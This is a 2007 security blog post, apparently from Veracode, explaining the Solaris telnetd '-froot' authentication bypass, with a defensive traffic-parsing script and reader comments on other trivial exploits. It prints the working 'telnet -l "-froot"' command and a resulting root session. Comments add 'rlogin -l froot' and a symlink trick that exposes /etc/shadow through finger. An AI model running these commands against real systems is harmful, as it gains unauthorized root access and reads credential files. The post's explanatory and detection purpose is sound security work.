An annoyingly stupid vulnerability in the stock Solaris 10/11 telnet daemon, courtesy of Full Disclosure (more details in this PDF, but it's NSFW): Pass "-f[user]" as the "-l" option to telnet, and presto, you bypass the entire authentication process and are logged in as the user of your choice! Works for the root user too, as long as the server is configured to allow remote root logins.

ceng@localhost [~]$ telnet a.b.c.d -l "-froot"
Trying a.b.c.d...
Connected to a.b.c.d.
Escape character is '^]'.
Last login: Thu Feb  1 02:28:29 from w.x.y.z
JESv4 Message of The Day (MOTD)

Welcome to the Sun Java Enterprise System 2005Q4!

[a.b.c.d ~]#id
uid=0(root) gid=0(root)
[a.b.c.d ~]#uname -a
SunOS a.b.c.d 5.10 Generic_118844-26 i86pc i386 i86pc

Amazing, isn't it? This works because in.telnetd execs the Solaris login program to perform authentication. It passes the user-supplied "-l" value straight through as a command line argument to login, and login in turn supports an "-f" option that skips authentication entirely when login was invoked by the root user. Since in.telnetd is running as root, login inherits those privileges and happily carries out the request to bypass authentication: the username "-froot" is never treated as a username at all, but as the flags "-f root".
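The defender's view of the same bug, as an added example that is not part of the original post: the client's "-l" value reaches in.telnetd as the USER variable of the TELNET NEW-ENVIRON option (RFC 1572), so the thing to look for on the wire, or to reject in a daemon before building the login argv, is a USER value that begins with "-". The small parser below walks NEW-ENVIRON suboptions in a client-to-server byte stream and flags such values; the sample traffic is constructed here for illustration, and is_safe_login_name is an assumed hardening check rather than Sun's actual fix.

```python
"""
Detect the login(1) argument-injection pattern in TELNET NEW-ENVIRON traffic.

Added example, not code from the original post or from Solaris. Option
and subcommand numbers are from RFC 854 / RFC 1572; the sample byte
strings at the bottom are constructed for this example.
"""

IAC, SB, SE = 0xFF, 0xFA, 0xF0          # telnet command bytes (RFC 854)
NEW_ENVIRON = 39                        # option code (RFC 1572)
IS, SEND, INFO = 0, 1, 2                # NEW-ENVIRON subcommands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3   # NEW-ENVIRON type codes


def iter_suboptions(stream: bytes):
    """Yield (option, payload) for every IAC SB <opt> ... IAC SE in stream.

    Note: a doubled IAC (0xFF 0xFF) inside a payload is not unescaped here;
    that is enough for the USER variable, which is plain ASCII in practice.
    """
    i = 0
    while True:
        start = stream.find(bytes([IAC, SB]), i)
        if start < 0 or start + 2 >= len(stream):
            return
        end = stream.find(bytes([IAC, SE]), start + 3)
        if end < 0:
            return
        yield stream[start + 2], stream[start + 3:end]
        i = end + 2


def parse_new_environ(payload: bytes) -> dict:
    """Parse an IS/INFO NEW-ENVIRON payload into {variable_name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    result = {}
    name, value = bytearray(), bytearray()
    target = None  # buffer that receives ordinary bytes until the next type code

    def flush():
        if name:
            result[bytes(name).decode("ascii", "replace")] = \
                bytes(value).decode("ascii", "replace")

    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):         # start of a new variable name
            flush()
            name.clear()
            value.clear()
            target = name
        elif b == VALUE:                # switch to collecting the value
            target = value
        elif b == ESC and i + 1 < len(payload):   # escaped literal byte
            i += 1
            if target is not None:
                target.append(payload[i])
        elif target is not None:
            target.append(b)
        i += 1
    flush()
    return result


def is_safe_login_name(user: str) -> bool:
    """Assumed daemon-side check: never hand login(1) a name it would parse as a flag."""
    return bool(user) and not user.startswith("-") and user.isprintable()


def suspicious_users(stream: bytes) -> list:
    """Return every NEW-ENVIRON USER value that login(1) would read as an option."""
    hits = []
    for opt, payload in iter_suboptions(stream):
        if opt != NEW_ENVIRON:
            continue
        user = parse_new_environ(payload).get("USER", "")
        if user and not is_safe_login_name(user):
            hits.append(user)
    return hits


# Constructed sample traffic: an ordinary login, then the "-froot" pattern.
BENIGN = (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
          + bytes([VALUE]) + b"alice" + bytes([IAC, SE]))
ATTACK = (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
          + bytes([VALUE]) + b"-froot" + bytes([IAC, SE]))

if __name__ == "__main__":
    for label, s in (("benign", BENIGN), ("attack", ATTACK)):
        print(f"{label}: {suspicious_users(s)}")
```

Run stand-alone the script reports an empty list for the benign session and ["-froot"] for the second one; the same suspicious_users() call can be pointed at the client half of a captured telnet session to confirm whether an unpatched daemon was ever driven this way.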

This is fun to laugh at and all, but it falls into that scary category of "trivially exploitable" vulnerabilities -- those that are so easy to exploit that you don't even need special tools, not even a shell script (though the original advisory for this bug jokingly includes a script, marked "CLASSIFIED CONFIDENTIAL SOURCE MATERIAL" -- cute).

Trivially exploitable vulnerabilities have caused a lot of trouble in the past, as everyone with a shell prompt would test it out to see if it worked (admit it, you probably tried to telnet to your nearest Solaris 10 box before you read this far). Think back to the mid-90s and the infamous Ping of Death, in which an overly long ICMP payload would DoS most TCP/IP stacks, thanks to the Windows ping command permitting payload sizes longer than it should.

Ironically, Sun released an advisory just a couple weeks ago for an issue whereby a single ICMP packet causes a kernel panic and Denial of Service on a Solaris 10 box. No details on packet construction, but they do provide a stack trace which should aid in tracking down the bug, if one were so inclined.

If you really want to flip back in the history books, look up the WIZ command in sendmail, which was one of several vulnerabilities the famous Morris Worm used to propagate. Elegant attack -- just type WIZ and you'd get a shell. How far we've come in 19 years!

What's the best (read: funniest) "trivially exploitable" vulnerability that you've encountered over the years? Leave a comment.

About Chris Eng

Chris Eng, vice president of research, is responsible for integrating security expertise into Veracode’s technology. In addition to helping define and prioritize the security feature set of the Veracode service, he consults frequently with customers to discuss and advance their application security initiatives. With over 15 years of experience in application security, Chris brings a wealth of practical expertise to Veracode.

Comments (3)

reillyb | February 14, 2007 12:01 am

1) How many password-less accounts could IRIX ship with? ;)

2) ancient setuid finger bug, i.e.:

% ln -s /etc/shadow ~/.plan
% finger me

3) land vulnerability re-introduced into the XPSP2 IPv6 stack

Mike F. | February 14, 2007 1:41 pm

This smells like the old AIX rlogin bug all over again...

rlogin -l froot

Chris | February 16, 2007 2:59 pm

How about:

Removable media mounted automatically, without the nosuid option? Pop in a CD and it is off to the races.

Default /etc/hosts.equiv evilly prepopulated

A bunch of stuff in Farmer and Venema's Admin's Guide to Cracking
